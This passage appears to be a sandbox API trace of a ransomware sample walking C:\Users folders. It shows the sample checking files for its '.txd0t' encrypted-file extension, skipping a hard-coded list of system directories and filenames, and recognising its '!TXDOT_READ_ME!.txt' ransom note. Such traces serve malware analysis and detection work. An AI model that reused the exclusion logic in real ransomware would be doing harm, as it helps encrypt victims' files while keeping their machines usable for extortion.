returned 0 [0119.939] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44514d30, ftCreationTime.dwHighDateTime=0x1d5e0bc, ftLastAccessTime.dwLowDateTime=0x594629e0, ftLastAccessTime.dwHighDateTime=0x1d5ee81, ftLastWriteTime.dwLowDateTime=0x530a775c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6f98, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="VzUBwEA5P.avi.txd0t", cAlternateFileName="VZUBWE~1.TXD")) returned 1 [0119.939] StrCmpW (psz1="VzUBwEA5P.avi.txd0t", psz2=".") returned 1 [0119.939] StrCmpW (psz1="VzUBwEA5P.avi.txd0t", psz2="..") returned 1 [0119.939] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.939] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.939] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="VzUBwEA5P.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t" [0119.939] PathFindExtensionW (pszPath="VzUBwEA5P.avi.txd0t") returned=".txd0t" [0119.939] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.939] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1305e060, ftCreationTime.dwHighDateTime=0x1d5e116, ftLastAccessTime.dwLowDateTime=0x62ec8ea0, ftLastAccessTime.dwHighDateTime=0x1d5e16e, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1163c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WxV-TMM4v.avi.txd0t", cAlternateFileName="WXV-TM~1.TXD")) returned 1 [0119.939] StrCmpW (psz1="WxV-TMM4v.avi.txd0t", psz2=".") returned 1 [0119.939] StrCmpW (psz1="WxV-TMM4v.avi.txd0t", psz2="..") returned 1 [0119.939] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.939] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.939] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="WxV-TMM4v.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t" [0119.939] PathFindExtensionW (pszPath="WxV-TMM4v.avi.txd0t") returned=".txd0t" [0119.939] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.939] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1305e060, ftCreationTime.dwHighDateTime=0x1d5e116, ftLastAccessTime.dwLowDateTime=0x62ec8ea0, ftLastAccessTime.dwHighDateTime=0x1d5e16e, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1163c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WxV-TMM4v.avi.txd0t", cAlternateFileName="WXV-TM~1.TXD")) returned 0 [0119.939] FindClose (in: hFindFile=0xec1df0 | out: hFindFile=0xec1df0) returned 1 [0119.939] GetProcessHeap () returned 0xe30000 [0119.939] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.940] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WlTa", cAlternateFileName="")) returned 1 [0119.940] StrCmpW (psz1="WlTa", psz2=".") returned 1 [0119.940] StrCmpW (psz1="WlTa", psz2="..") returned 1 [0119.940] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.940] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.940] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="WlTa", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\system32\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\system\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\local\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\boot\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\perflogs\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\programdata\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\drivers\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\wsus\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="crypt_detect") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="cryptolocker") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="ransomware") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\WINDOWS") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.940] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\Program Files") returned 0x0 [0119.940] GetProcessHeap () returned 0xe30000 [0119.940] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b8) returned 0xed39f8 [0119.940] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0119.940] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\*", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\*") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\*" [0119.940] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\WlTa\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1eb0 [0119.941] StrCmpW (psz1=".", psz2=".") returned 0 [0119.941] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.941] StrCmpW (psz1="..", psz2=".") returned 1 [0119.941] StrCmpW (psz1="..", psz2="..") returned 0 [0119.941] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x530f3d77, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x530f3d77, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530f3d77, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.941] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.941] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.941] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0119.941] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0119.941] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt" [0119.941] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.941] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.941] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.941] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43e16650, ftCreationTime.dwHighDateTime=0x1d5e96d, ftLastAccessTime.dwLowDateTime=0x24e5b230, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x530f3d77, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x461c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="2oN gpnuW1JXd5I9rz.swf.txd0t", cAlternateFileName="2ONGPN~1.TXD")) returned 1 [0119.941] StrCmpW (psz1="2oN gpnuW1JXd5I9rz.swf.txd0t", psz2=".") returned 1 [0119.941] StrCmpW (psz1="2oN gpnuW1JXd5I9rz.swf.txd0t", psz2="..") returned 1 [0119.941] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0119.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0119.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="2oN gpnuW1JXd5I9rz.swf.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t" [0119.942] PathFindExtensionW (pszPath="2oN gpnuW1JXd5I9rz.swf.txd0t") returned=".txd0t" [0119.942] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.942] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a48dba0, ftCreationTime.dwHighDateTime=0x1d5ee05, ftLastAccessTime.dwLowDateTime=0xd9522960, ftLastAccessTime.dwHighDateTime=0x1d5ebeb, ftLastWriteTime.dwLowDateTime=0x5311bf38, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17f7f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="2q3Ks4TNs0IQQ.swf.txd0t", cAlternateFileName="2Q3KS4~1.TXD")) returned 1 [0119.942] StrCmpW (psz1="2q3Ks4TNs0IQQ.swf.txd0t", psz2=".") returned 1 [0119.942] StrCmpW (psz1="2q3Ks4TNs0IQQ.swf.txd0t", psz2="..") returned 1 [0119.942] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0119.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0119.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="2q3Ks4TNs0IQQ.swf.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t" [0119.942] PathFindExtensionW (pszPath="2q3Ks4TNs0IQQ.swf.txd0t") returned=".txd0t" [0119.942] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.942] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb99a5d50, ftCreationTime.dwHighDateTime=0x1d5e6b8, ftLastAccessTime.dwLowDateTime=0x109bc870, ftLastAccessTime.dwHighDateTime=0x1d5e27a, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10908, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="d0y3irQ9gxE8.flv.txd0t", cAlternateFileName="D0Y3IR~1.TXD")) returned 1 [0119.942] StrCmpW (psz1="d0y3irQ9gxE8.flv.txd0t", psz2=".") returned 1 [0119.942] StrCmpW (psz1="d0y3irQ9gxE8.flv.txd0t", psz2="..") returned 1 [0119.942] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0119.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0119.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="d0y3irQ9gxE8.flv.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t" [0119.942] PathFindExtensionW (pszPath="d0y3irQ9gxE8.flv.txd0t") returned=".txd0t" [0119.942] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.942] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e5d300, ftCreationTime.dwHighDateTime=0x1d5e133, ftLastAccessTime.dwLowDateTime=0x883aa2b0, ftLastAccessTime.dwHighDateTime=0x1d5e113, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x95cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="r47Nb711Z06w9.mp4.txd0t", cAlternateFileName="R47NB7~1.TXD")) returned 1 [0119.942] StrCmpW (psz1="r47Nb711Z06w9.mp4.txd0t", psz2=".") returned 1 [0119.942] StrCmpW (psz1="r47Nb711Z06w9.mp4.txd0t", psz2="..") returned 1 [0119.942] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0119.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0119.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="r47Nb711Z06w9.mp4.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t" [0119.942] PathFindExtensionW (pszPath="r47Nb711Z06w9.mp4.txd0t") returned=".txd0t" [0119.942] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.942] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e5d300, ftCreationTime.dwHighDateTime=0x1d5e133, ftLastAccessTime.dwLowDateTime=0x883aa2b0, ftLastAccessTime.dwHighDateTime=0x1d5e113, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x95cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="r47Nb711Z06w9.mp4.txd0t", cAlternateFileName="R47NB7~1.TXD")) returned 0 [0119.942] FindClose (in: hFindFile=0xec1eb0 | out: hFindFile=0xec1eb0) returned 1 [0119.942] GetProcessHeap () returned 0xe30000 [0119.942] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.943] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WlTa", cAlternateFileName="")) returned 0 [0119.943] FindClose (in: hFindFile=0xec1b30 | out: hFindFile=0xec1b30) returned 1 [0119.943] GetProcessHeap () returned 0xe30000 [0119.943] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.943] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0119.943] FindClose (in: hFindFile=0xec1bb0 | out: hFindFile=0xec1bb0) returned 1 [0119.943] GetProcessHeap () returned 0xe30000 [0119.943] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0119.943] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0119.943] StrCmpW (psz1="Public", psz2=".") returned 1 [0119.943] StrCmpW (psz1="Public", psz2="..") returned 1 [0119.943] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0119.943] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0119.943] StrNCatW (in: psz1="C:\\Users\\", psz2="Public", cchMax=1042 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\system32\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\system\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\local\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\boot\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\perflogs\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\programdata\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\drivers\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\wsus\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="crypt_detect") returned 0x0 [0119.943] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="cryptolocker") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="ransomware") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\WINDOWS") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.944] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\Program Files") returned 0x0 [0119.944] GetProcessHeap () returned 0xe30000 [0119.944] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a0) returned 0x6874278 [0119.944] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.944] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\*", cchMax=1056 | out: psz1="C:\\Users\\Public\\*") returned="C:\\Users\\Public\\*" [0119.944] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, 